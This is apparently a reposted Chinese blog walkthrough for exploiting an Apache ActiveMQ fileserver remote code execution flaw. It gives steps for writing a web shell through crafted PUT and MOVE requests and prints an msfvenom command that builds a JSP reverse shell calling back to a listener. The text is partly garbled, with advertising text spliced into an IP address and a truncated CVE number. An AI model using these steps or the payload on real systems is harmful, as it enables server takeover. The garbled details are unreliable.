Apache ActiveMQ 远程代码执行漏洞 (CVE-


方法1.直接写shell
访问http://120免费云主机域名.79.1.70:8161/fileserver 直接用bp拦截之后把post改成put 在往后面加几行如下图:chen.txt:
返回204代表成功,之后再把put改成move 后面再加一行
最后直接访问 后面加一个api就成功了
方法2.利用 cron 定时任务写 shell
现在kali里面生成一个***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上传到桌面进行打开如下图:
之后和之前一样 在第一行的后面添加一行到网站上进行查看有没有
之后打开kali 进行监听就成功了!

相关推荐: 脚本助手之echo命令显示带指定颜色的字!

目的:脚本使用的时候,如果输出带颜色,可判断脚本哪里出了问题。echo 参数,可指明带颜色的字体。echo –help或者man echoecho显示带颜色,需要使用参数-e格式如下:echo -e “33[字背景颜色;文字颜色m字符串33[0m”例如:ec…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 01/26 12:50
下一篇 01/26 12:55